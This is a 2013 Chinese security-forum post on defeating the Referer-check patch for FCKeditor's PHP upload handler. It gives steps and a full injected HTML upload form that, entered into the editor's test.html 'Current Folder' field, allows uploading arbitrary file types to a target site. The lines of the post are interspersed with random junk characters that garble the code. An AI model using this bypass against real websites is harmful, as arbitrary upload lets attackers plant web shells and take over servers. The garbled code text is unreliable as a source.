找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2306|回复: 0
打印 上一主题 下一主题

fckeditor 漏洞修复后的二次利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:12:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php: F" q  r" z( g& m
网上给出的修复方案是
3 [0 Z3 L6 A8 ]* a' M- ?* O修复方法,删除FCK编辑器用其他的编辑器, G2 ?& g5 j& y4 t
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
, y2 {4 ~, l. w! a* k
6 t% n5 t# p1 u( _1 nrequire(‘config.php’);- h9 w7 L0 C' G! G! I/ y
require(‘util.php’);
# B" f) g5 u! Z8 l7 f4 O8 L0 c的下面添加以下代码—————————–
+ P" x* g# G9 ]" ~' i//防止外部提交$ r6 |' ~* v5 L4 G5 f8 R  g$ d8 j* F
function outsidepost()  `/ p3 a2 e3 Q, @0 V) x* z
{5 c" Z2 g0 Q4 }
$servername=$_SERVER['SERVER_NAME'];
2 J' @3 d9 e9 Q. k, G$sub_from=@$_SERVER['HTTP_REFERER'];
' N& F; \+ w3 b+ @$sub_len=strlen($servername);- y8 `/ M+ W% A* e6 R4 `( ?, R
$checkfrom=substr($sub_from,7,$sub_len);% s1 E. X, p1 A
if($checkfrom!=$servername){
; E& x  e2 e0 s8 a$ Mecho(“you don’t outsidepost!”);
- m/ H- f4 W+ t- I! i" O: zexit;! C' U. U: Y/ g# |& d! w6 S
}/ j6 _+ {4 S  R: x8 N' T& @
}
+ X2 g" W) ?; S8 r" o# ooutsidepost();" f3 Y  u; H* ?9 Z
防止外部提交,但是没有防止内部提交,
& B1 c- T  k+ P, N$ {" I$ v利用方法:/ v, Z, ^, U4 g5 K
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
# b$ U" }& _7 f) u# _" j" N# n3 y2,在Current Folder 框输入
6 F9 o/ w" z; O' ^. w- m* i<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
7 E4 J( ^' J. ~! C- @2 D: ?. p然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
" o  Q) r5 [6 _7 i% qPS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表